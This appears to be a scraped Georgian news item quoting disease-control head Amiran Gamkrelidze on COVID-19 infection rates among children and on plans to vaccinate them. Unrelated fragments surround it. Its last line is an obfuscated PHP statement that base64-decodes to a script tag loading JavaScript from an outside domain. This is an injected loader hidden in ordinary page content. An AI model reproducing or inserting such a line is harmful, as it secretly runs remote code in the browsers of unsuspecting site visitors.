celsiusi
ავერსი შნაიდერი
"14 წლამდე ბავშვებში ჩვენ გვაქვს ინფიცირების 15%-იანი მაჩვენებელი, ხოლო 19 წლამდე - 20%-მდე ანუ დღეს რომ 4700 შემთხვევა იყო, აქედან 15% 14 წლამდე ბავშვი იყო ინფიცირებული“, - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ ჟურნალისტებთან საუბრისას განაცხადა.
 
ამასთან, მისი თქმით, ბავშვთა ვაქცინაციის საკითხი იხილება და შემოდგომაზე გადაწყვეტილებები იქნება მიღებული.
 
ბავშვების ვაქცინაციასთან დაკავშირებით არ არის ერთიანი შეხედულება, მსოფლიოს მასშტაბით. როგორც წესი, 12 წლის ზემოთ ასაკის ბავშვებში მხოლოდ ორ ვაქცინას აქვს მიღებული ჯანმოს ავტორიზაცია - ეს არის „ფაიზერი“ და „მოდერნა“. ამ აცრებით ბავშვებში ვაქცინაცია დაწყებულია მთელ რიგ ქვეყნებში - კანადამ დაიწყო, აშშ მიჰყვა, ასევე აცრები ხდება იტალიაში, საფრანგეთში, გერმანიასა და ბელგიაში.
 
სკანდინავიის ქვეყნებში ამასთან დაკავშირებით სერიოზული მსჯელობა მიმდინარეობს. ასევე ამ საკითხს განიხილავს ჯანდაცვის მსოფლიო ორგანიზაციაც. მათი წინადადება ამ ეტაპზე არის, რომ ვაქცინაცია შესაძლებელია მხოლოდ გარკვეულ ჯგუფებზე კონკრეტული ჩვენებებით ანუ სადაც არის განსაკუთრებული საფრთხე და თანმხლები დაავადებები. რამდენიმე მსგავსი შემთხვევა ჩვენც გვქონდა - თუ არ ვცდები, 12-დან 15 წლამდე 10-მდე ბავშვი ავცერით“, - განაცხადა ამირან გამყრელიძემ და დასძინა, რომ ერთადერთი ქვეყანაა ჩინეთი და მის გვერდით მდებარე რამდენიმე სახელმწიფო, სადაც 3 წლის ასაკის ბავშვების „სინოვაკით“ და „სინოფარმით“ აცრა დაიწყეს.
1177
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");